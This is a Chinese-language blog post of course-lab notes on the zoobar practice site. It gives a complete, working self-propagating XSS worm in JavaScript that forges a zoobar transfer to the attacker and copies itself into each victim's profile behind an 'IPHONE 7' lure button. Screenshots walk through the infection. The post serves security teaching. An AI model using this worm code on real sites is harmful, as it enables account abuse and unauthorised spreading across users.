<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.2" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="web,security," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.2" />






<meta name="description" content="&amp;#x4E00;&amp;#x3001;XSS&amp;#x653B;&amp;#x51FB;&amp;#x539F;&amp;#x7406;
XSS&amp;#x53C8;&amp;#x79F0;CSS&amp;#xFF0C;&amp;#x5168;&amp;#x79F0;Cross Site Script&amp;#xFF0C;&amp;#x8DE8;&amp;#x7AD9;&amp;#x811A;&amp;#x672C;&amp;#x653B;&amp;#x51FB;&amp;#xFF0C;&amp;#x662F;Web&amp;#x7A0B;&amp;#">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS worm">
<meta property="og:url" content="http://yoursite.com/2016/12/22/XSS-worm/index.html">
<meta property="og:site_name" content="Twilighce">
<meta property="og:description" content="&amp;#x4E00;&amp;#x3001;XSS&amp;#x653B;&amp;#x51FB;&amp;#x539F;&amp;#x7406;
XSS&amp;#x53C8;&amp;#x79F0;CSS&amp;#xFF0C;&amp;#x5168;&amp;#x79F0;Cross Site Script&amp;#xFF0C;&amp;#x8DE8;&amp;#x7AD9;&amp;#x811A;&amp;#x672C;&amp;#x653B;&amp;#x51FB;&amp;#xFF0C;&amp;#x662F;Web&amp;#x7A0B;&amp;#">
<meta property="og:image" content="http://oimbmvqt3.bkt.clouddn.com/1.jpg">
<meta property="og:image" content="http://oimbmvqt3.bkt.clouddn.com/2.PNG">
<meta property="og:image" content="http://oimbmvqt3.bkt.clouddn.com/3.PNG">
<meta property="og:image" content="http://oimbmvqt3.bkt.clouddn.com/4.PNG">
<meta property="og:image" content="http://oimbmvqt3.bkt.clouddn.com/5.PNG">
<meta property="og:image" content="http://oimbmvqt3.bkt.clouddn.com/6.PNG">
<meta property="og:updated_time" content="2017-01-20T08:34:31.591Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="XSS worm">
<meta name="twitter:description" content="&amp;#x4E00;&amp;#x3001;XSS&amp;#x653B;&amp;#x51FB;&amp;#x539F;&amp;#x7406;
XSS&amp;#x53C8;&amp;#x79F0;CSS&amp;#xFF0C;&amp;#x5168;&amp;#x79F0;Cross Site Script&amp;#xFF0C;&amp;#x8DE8;&amp;#x7AD9;&amp;#x811A;&amp;#x672C;&amp;#x653B;&amp;#x51FB;&amp;#xFF0C;&amp;#x662F;Web&amp;#x7A0B;&amp;#">
<meta name="twitter:image" content="http://oimbmvqt3.bkt.clouddn.com/1.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.2',
    sidebar: {"position":"left","display":"always","offset":12,"offset_float":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn"}},
    duoshuo: {
      userId: '0',
      author: '小水'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2016/12/22/XSS-worm/"/>





  <title>XSS worm | Twilighce</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Twilighce</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2016/12/22/XSS-worm/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Itachi">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="http://oimbmvqt3.bkt.clouddn.com/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Twilighce">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">XSS worm</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2016-12-22T23:15:59+08:00">
                2016-12-22
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/course-notes/" itemprop="url" rel="index">
                    <span itemprop="name">course notes</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2016/12/22/XSS-worm/" class="leancloud_visitors" data-flag-title="XSS worm">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">Visitors&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          






&nbsp; | &nbsp;
<span id="/2016/12/22/XSS-worm/"class="leancloud_visitors" data-flag-title="XSS worm">
         &nbsp;Visitors
        </span>






        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="&#x4E00;&#x3001;XSS&#x653B;&#x51FB;&#x539F;&#x7406;"><a href="#&#x4E00;&#x3001;XSS&#x653B;&#x51FB;&#x539F;&#x7406;" class="headerlink" title="&#x4E00;&#x3001;XSS&#x653B;&#x51FB;&#x539F;&#x7406;"></a>&#x4E00;&#x3001;XSS&#x653B;&#x51FB;&#x539F;&#x7406;</h3><ul>
<li><p>XSS&#x53C8;&#x79F0;CSS&#xFF0C;&#x5168;&#x79F0;Cross Site Script&#xFF0C;&#x8DE8;&#x7AD9;&#x811A;&#x672C;&#x653B;&#x51FB;&#xFF0C;&#x662F;Web&#x7A0B;&#x5E8F;&#x4E2D;&#x5E38;&#x89C1;&#x7684;&#x6F0F;&#x6D1E;&#x3002;</p>
</li>
<li><p>&#x539F;&#x7406;&#x662F;&#x653B;&#x51FB;&#x8005;&#x5411;&#x6709; XSS&#x6F0F;&#x6D1E;&#x7684;&#x7F51;&#x7AD9;&#x4E2D;&#x8F93;&#x5165;(&#x4F20;&#x5165;)&#x6076;&#x610F;&#x7684;&#x4EE3;&#x7801;&#xFF0C;&#x5F53;&#x5176;&#x5B83;&#x7528;&#x6237;&#x6D4F;&#x89C8;&#x8BE5;&#x7F51;&#x7AD9;&#x65F6;&#xFF0C;&#x8FD9;&#x6BB5;&#x4EE3;&#x7801;&#x4F1A;&#x81EA;&#x52A8;&#x6267;&#x884C;&#xFF0C;&#x4ECE;&#x800C;&#x8FBE;&#x5230;&#x653B;&#x51FB;&#x7684;&#x76EE;&#x7684;&#x3002;&#x5982;&#xFF1A;&#x76D7;&#x53D6;&#x7528;&#x6237; Cookie&#x3001;&#x7834;&#x574F;&#x9875;&#x9762;&#x7ED3;&#x6784;&#x3001;&#x91CD;&#x5B9A;&#x5411;&#x5230;&#x5176;&#x5B83;&#x7F51;&#x7AD9;&#x7B49;&#x3002;</p>
</li>
</ul>
<h3 id="&#x4E8C;&#x3001;&#x73AF;&#x5883;&#x914D;&#x7F6E;"><a href="#&#x4E8C;&#x3001;&#x73AF;&#x5883;&#x914D;&#x7F6E;" class="headerlink" title="&#x4E8C;&#x3001;&#x73AF;&#x5883;&#x914D;&#x7F6E;"></a>&#x4E8C;&#x3001;&#x73AF;&#x5883;&#x914D;&#x7F6E;</h3><ol>
<li><p>linux&#x73AF;&#x5883;&#x4E0B;&#xFF0C; &#x5B89;&#x88C5;apache2&#x3001;mysql,&#x3001;php5&#x3002;</p>
</li>
<li><p>&#x5C06;myzoo&#x6587;&#x4EF6;&#x90E8;&#x7F72;&#x5230;apache2&#x670D;&#x52A1;&#x5668;&#x4E0A;&#xFF0C;&#x6CE8;&#x610F;&#x5728;mysql&#x4E2D;&#x521B;&#x5EFA;&#x7684;&#x6570;&#x636E;&#x5E93;&#x548C;&#x8868;&#xFF0C;&#x8981;&#x548C;zoobar&#x7F51;&#x7AD9;&#x6E90;&#x7801;&#x4E2D;&#x5BF9;&#x5E94;&#x3002;</p>
</li>
</ol>
<h3 id="&#x4E09;&#x3001;&#x5229;&#x7528;ajax&#x5B9E;&#x73B0;XSS-worm"><a href="#&#x4E09;&#x3001;&#x5229;&#x7528;ajax&#x5B9E;&#x73B0;XSS-worm" class="headerlink" title="&#x4E09;&#x3001;&#x5229;&#x7528;ajax&#x5B9E;&#x73B0;XSS worm"></a>&#x4E09;&#x3001;&#x5229;&#x7528;ajax&#x5B9E;&#x73B0;XSS worm</h3><h4 id="1&#x3001;&#x653B;&#x51FB;&#x539F;&#x7406;"><a href="#1&#x3001;&#x653B;&#x51FB;&#x539F;&#x7406;" class="headerlink" title="1&#x3001;&#x653B;&#x51FB;&#x539F;&#x7406;"></a>1&#x3001;&#x653B;&#x51FB;&#x539F;&#x7406;</h4><a id="more"></a>
<ul>
<li><p>&#x5728;zoobar&#x7F51;&#x7AD9;&#x4E0A;&#x6CE8;&#x518C;&#x4E86;&#x7528;&#x6237;A&#x3001;B&#x3002;&#x5176;&#x4E2D;A&#x4F5C;&#x4E3A;&#x653B;&#x51FB;&#x8005;&#x3002;A&#x3001;B&#x8D44;&#x6599;&#x9875;&#x9762;&#x90FD;&#x6709;profile&#x680F;&#x53EF;&#x4F9B;&#x8F93;&#x5165;&#x3002;&#x7406;&#x8BBA;&#x4E0A;&#xFF0C;&#x6240;&#x6709;&#x53EF;&#x8F93;&#x5165;&#x7684;&#x5730;&#x65B9;&#x5982;&#x679C;&#x6CA1;&#x6709;&#x5BF9;&#x8F93;&#x5165;&#x6570;&#x636E;&#x8FDB;&#x884C;&#x5904;&#x7406;&#xFF0C;&#x90FD;&#x4F1A;&#x5B58;&#x5728;XSS&#x6F0F;&#x6D1E;&#xFF0C;&#x6F0F;&#x6D1E;&#x7684;&#x5371;&#x5BB3;&#x53D6;&#x51B3;&#x4E8E;&#x653B;&#x51FB;&#x4EE3;&#x7801;&#x7684;&#x5A01;&#x529B;&#x3002;</p>
</li>
<li><p>&#x5F53;B&#x770B;A&#x7684;&#x7B80;&#x4ECB;&#x65F6;&#xFF0C;B&#x7684;&#x4E00;&#x4E2A;zoobar&#x88AB;&#x8F6C;&#x79FB;&#x7ED9;A&#x3002;&#x6B64;&#x65F6;&#x662F;&#x5728;B&#x7684;&#x767B;&#x9646;&#x9875;&#x9762;&#xFF0C;B&#x770B;A&#x7684;&#x7B80;&#x4ECB;&#x65F6;&#x6267;&#x884C;&#x4E86;&#x4E00;&#x6BB5;&#x811A;&#x672C;&#xFF0C;&#x8BE5;&#x811A;&#x672C;&#x53D1;&#x9001;&#x7ED9;&#x670D;&#x52A1;&#x5668;&#xFF0C;&#x662F;&#x4EE5;&#x81EA;&#x5DF1;&#x7684;cookie&#x53D1;&#x9001;&#x7684;&#xFF0C;&#x56E0;&#x6B64;&#x8BE5;&#x811A;&#x672C;&#x7684;&#x4F5C;&#x7528;&#x662F;&#x4F2A;&#x9020;&#x4E00;&#x4E2A;&#x8BF7;&#x6C42;&#xFF0C;&#x4EE5;B&#x7684;&#x540D;&#x4E49;&#xFF0C;&#x5411;&#x670D;&#x52A1;&#x5668;&#x53D1;&#x9001;&#x8F6C;&#x79FB;zoobar&#x7684;&#x8868;&#x5355;&#x3002;</p>
</li>
<li><p>&#x5F53;&#x7528;&#x6237;B&#x770B;A&#x7684;&#x7B80;&#x4ECB;&#x65F6;&#xFF0C;&#x81EA;&#x5DF1;&#x7684;&#x7B80;&#x4ECB;&#x4F1A;&#x88AB;&#x6539;&#x52A8;&#xFF0C;&#x8BF4;&#x660E;A&#x4F2A;&#x9020;&#x4E86;&#x4E00;&#x4E2A;&#x8BF7;&#x6C42;&#xFF0C;&#x63D0;&#x4EA4;&#x7ED9;&#x670D;&#x52A1;&#x5668;&#xFF0C;&#x4FEE;&#x6539;&#x4E86;B&#x7684;&#x7B80;&#x4ECB;&#x3002;&#x6211;&#x4EEC;&#x8981;&#x770B;&#x5F53;B&#x4FDD;&#x5B58;&#x81EA;&#x5DF1;&#x7684;&#x7B80;&#x4ECB;&#xFF0C;&#x70B9;&#x51FB;save&#x6309;&#x94AE;&#x65F6;&#xFF0C;&#x5411;&#x670D;&#x52A1;&#x5668;&#x4F20;&#x9001;&#x7684;&#x8BF7;&#x6C42;&#x65F6;&#x4EC0;&#x4E48;&#xFF0C;&#x7136;&#x540E;&#x6839;&#x636E;&#x8BE5;&#x8BF7;&#x6C42;&#x4F2A;&#x9020;&#x3002;</p>
</li>
</ul>
<h4 id="2&#x3001;&#x653B;&#x51FB;&#x5B9E;&#x73B0;"><a href="#2&#x3001;&#x653B;&#x51FB;&#x5B9E;&#x73B0;" class="headerlink" title="2&#x3001;&#x653B;&#x51FB;&#x5B9E;&#x73B0;"></a>2&#x3001;&#x653B;&#x51FB;&#x5B9E;&#x73B0;</h4><p>&#x5728;A&#x7684;profile&#x4E2D;&#x8F93;&#x5165;&#x5982;&#x4E0B;&#x4EE3;&#x7801;&#xFF1A;<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div></pre></td><td class="code"><pre><div class="line">&lt;script id=sc1&gt;</div><div class="line">function Steel() //&#x8F6C;&#x79FB;&#x53D7;&#x5BB3;&#x8005;&#x7684;&#x4E00;&#x4E2A;zoobar&#x7ED9;&#x653B;&#x51FB;&#x8005;</div><div class="line">{</div><div class="line">	var steelURL=&quot;https://localhost/transfer.php&quot;;  //&#x63D0;&#x4EA4;&#x7ED9;&#x670D;&#x52A1;&#x5668;&#x7AEF;&#x7684;&#x54EA;&#x4E00;&#x4E2A;&#x6587;&#x4EF6;&#xFF0C;&#x8FD9;&#x91CC;&#x7684;&#x5730;&#x5740;&#x662F;&#x9700;&#x8981;&#x6211;&#x4EEC;&#x4F2A;&#x9020;&#x7684;</div><div class="line">	var postStr1=&quot;zoobars=1&amp;recipient=a&amp;submission=Send&quot;;  //&#x9700;&#x8981;&#x6211;&#x4EEC;&#x4F2A;&#x9020;&#xFF0C;&#x5199;&#x7684;&#x662F;&#x9ED8;&#x8BA4;&#x8F6C;&#x79FB;&#x4E00;&#x4E2A;zoobar&#x7ED9;&#x7528;&#x6237;a</div><div class="line">	var ajax1=null;</div><div class="line">	if(window.XMLHttpRequest)</div><div class="line">	{</div><div class="line">		ajax1=new XMLHttpRequest();</div><div class="line">	}</div><div class="line">	else</div><div class="line">		return;</div><div class="line">	ajax1.open(&quot;POST&quot;,steelURL,true);</div><div class="line">	ajax1.setRequestHeader(&quot;Content-type&quot;,&quot;application/x-www-form-urlencoded&quot;);</div><div class="line">	ajax1.send(postStr1);</div><div class="line">}</div><div class="line">function Update()  //&#x66F4;&#x65B0;&#x53D7;&#x5BB3;&#x8005;&#x7684;profile&#x548C;&#x653B;&#x51FB;&#x8005;&#x4E00;&#x6837;</div><div class="line">{</div><div class="line">	var updateURL=&quot;https://localhost/index.php&quot;;  </div><div class="line">	var ajax2=null;</div><div class="line">	if(window.XMLHttpRequest)</div><div class="line">	{</div><div class="line">		ajax2=new XMLHttpRequest();</div><div class="line">	}</div><div class="line">	else</div><div class="line">		return;</div><div class="line">	ajax2.open(&quot;POST&quot;,updateURL,true);</div><div class="line">	var script=document.getElementById(&quot;sc1&quot;).innerHTML;</div><div class="line">	var script_clean = encodeURIComponent(script); </div><div class="line">	var postStr2=&quot;profile_update=&quot;;</div><div class="line">	postStr2=postStr2.concat(&quot;&lt;scr&quot;); </div><div class="line">	postStr2=postStr2.concat(&quot;ipt &quot;);</div><div class="line">	postStr2=postStr2.concat(&quot;id=sc1&gt;&quot;);</div><div class="line">	postStr2=postStr2.concat(script_clean);</div><div class="line">	postStr2=postStr2.concat(&quot;&lt;/scr&quot;);</div><div class="line">	postStr2=postStr2.concat(&quot;ipt&gt;&quot;);</div><div class="line">	postStr2=postStr2.concat(&quot;&lt;button type=button onclick={Steel();Update()}&gt;IPHONE 7&lt;button&gt;&quot;);</div><div class="line">	postStr2=postStr2.concat(&quot;&amp;profile_submit=Save&quot;);</div><div class="line">	ajax2.setRequestHeader(&quot;Content-type&quot;,&quot;application/x-www-form-urlencoded&quot;);</div><div class="line">	ajax2.send(postStr2);</div><div class="line"></div><div class="line">	ajax2.onreadystatechange=function()</div><div class="line">	{</div><div class="line">		if(ajax2.readyState==4&amp;&amp;ajax2.status==200)</div><div class="line">		{</div><div class="line">			alert(&quot;Uha!Your zoobar is mine!&quot;);</div><div class="line">		}</div><div class="line">	}</div><div class="line">}</div><div class="line">/* </div><div class="line"> * &#x4E3A;&#x4F7F;&#x4EE3;&#x7801;&#x53EF;&#x8FD0;&#x884C;&#xFF0C;&#x5728;zoobar&#x7F51;&#x7AD9;&#x7684;users.php&#x6587;&#x4EF6;&#x4E2D;allowed_tags&#x91CC;&#x52A0;&#x4E0A;&lt;script&gt;&#x6807;&#x7B7E;&#x3001;&lt;button&gt;&#x6807;&#x7B7E;&#xFF0C;</div><div class="line"> * disallow&#x91CC;&#x6CE8;&#x91CA;&#x6389;javascript&#x548C;button,</div><div class="line"> */</div><div class="line">/* </div><div class="line"> * &#x521B;&#x5EFA;&#x4E86;&#x4E00;&#x4E2A;button&#xFF0C;&#x5F53;&#x70B9;&#x51FB;&#x8BE5;button&#x65F6;&#xFF0C;&#x6267;&#x884C;&#x7684;&#x662F;&#x4E00;&#x4E2A;function&#xFF0C;&#x8BE5;function&#x4F2A;&#x9020;&#x4E86;&#x4E00;&#x4E2A;&#x8868;&#x5355;&#x8BF7;&#x6C42;&#x63D0;&#x4EA4;&#x7ED9;&#x670D;&#x52A1;&#x5668;</div><div class="line"> */</div><div class="line">&lt;/script&gt;&lt;button type=button onclick={Steel();Update()}&gt;IPHONE 7&lt;/button&gt;</div></pre></td></tr></table></figure></p>
<p>&#x5728;&#x653B;&#x51FB;&#x8005;A&#x7684;profile&#x4E2D;&#x5199;&#x5165;&#x653B;&#x51FB;&#x4EE3;&#x7801;&#xFF0C;A&#x73B0;&#x5728;&#x7684;zoobar&#x6709;21&#x4E2A;<br><img src="http://oimbmvqt3.bkt.clouddn.com/1.jpg" alt=""></p>
<p>&#x767B;&#x5F55;&#x53D7;&#x5BB3;&#x8005;C&#xFF0C;C&#x6B64;&#x65F6;&#x6709;10&#x4E2A;zoobar&#xFF0C;profile&#x4E3A;&#x7A7A;<br><img src="http://oimbmvqt3.bkt.clouddn.com/2.PNG" alt=""></p>
<p>&#x5728;C&#x4E2D;users&#x9875;&#x9762;&#x67E5;&#x770B;A&#xFF0C;&#x770B;&#x5230;A&#x7684;zoobar&#x662F;21&#x4E2A;&#xFF0C;&#x6709;&#x4E00;&#x4E2A;&#x8BF1;&#x5BFC;&#x6309;&#x94AE;&#x201D;IPHONE 7&#x201D;<br><img src="http://oimbmvqt3.bkt.clouddn.com/3.PNG" alt=""></p>
<p>&#x70B9;&#x51FB;IPONE 7&#x7684;&#x6309;&#x94AE;&#xFF0C;&#x5F39;&#x51FA;&#x7A97;&#x53E3;<br><img src="http://oimbmvqt3.bkt.clouddn.com/4.PNG" alt=""></p>
<p>&#x6B64;&#x65F6;&#x518D;&#x67E5;&#x770B;A&#xFF0C;&#x770B;&#x5230;A&#x7684;zoobar&#x53D8;&#x6210;22&#x4E2A;<br><img src="http://oimbmvqt3.bkt.clouddn.com/5.PNG" alt=""></p>
<p>&#x518D;&#x770B;C&#x7684;&#x8D44;&#x6599;&#x9875;&#x9762;&#xFF0C;C&#x7684;zoobar&#x53D8;&#x4E3A;9&#x4E2A;&#xFF0C;profile&#x88AB;&#x611F;&#x67D3;&#x6210;&#x548C;A&#x4E00;&#x6837;.Bingo!<br><img src="http://oimbmvqt3.bkt.clouddn.com/6.PNG" alt=""></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/web/" rel="tag"># web</a>
          
            <a href="/tags/security/" rel="tag"># security</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/12/22/hello-world/" rel="next" title="Hello World">
                <i class="fa fa-chevron-left"></i> Hello World
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2016/12/26/Tree/" rel="prev" title="Tree">
                Tree <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="vcomments"></div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            Overview
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          
            <img class="site-author-image" itemprop="image"
              src="http://oimbmvqt3.bkt.clouddn.com/avatar.jpg"
              alt="Itachi" />
          
            <p class="site-author-name" itemprop="name">Itachi</p>
            <p class="site-description motion-element" itemprop="description"></p>
        </div>

        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
            
              <a href="/archives/">
            
                <span class="site-state-item-count">47</span>
                <span class="site-state-item-name">posts</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">4</span>
                <span class="site-state-item-name">categories</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">15</span>
                <span class="site-state-item-name">tags</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#一、XSS攻击原理"><span class="nav-number">1.</span> <span class="nav-text">一、XSS攻击原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#二、环境配置"><span class="nav-number">2.</span> <span class="nav-text">二、环境配置</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#三、利用ajax实现XSS-worm"><span class="nav-number">3.</span> <span class="nav-text">三、利用ajax实现XSS worm</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1、攻击原理"><span class="nav-number">3.1.</span> <span class="nav-text">1、攻击原理</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2、攻击实现"><span class="nav-number">3.2.</span> <span class="nav-text">2、攻击实现</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Itachi</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" href="https://hexo.io">Hexo</a></div>

  <span class="post-meta-divider">|</span>

  <div class="theme-info">Theme &mdash; <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.2</div>


        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.2"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.2"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.2"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.2"></script>



  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.2"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.2"></script>


  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.2"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.2"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.2"></script>



  


  




	





  





  






  
  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/valine@1.1.4/dist/Valine.min.js"></script>
  <script type="text/javascript">
    new Valine({
        av: AV,
        el: '#vcomments' ,
        verify: false,
        notify: false,
        app_id: 'MRmUdkrxm6Eue1CWcj9t3Rvm-gzGzoHsz',
        app_key: 'jNbXomvDbwDsLHOuRnx7mTPC',
        placeholder: 'Comment input placeholder'
    });
  </script>



  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("MRmUdkrxm6Eue1CWcj9t3Rvm-gzGzoHsz", "jNbXomvDbwDsLHOuRnx7mTPC");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
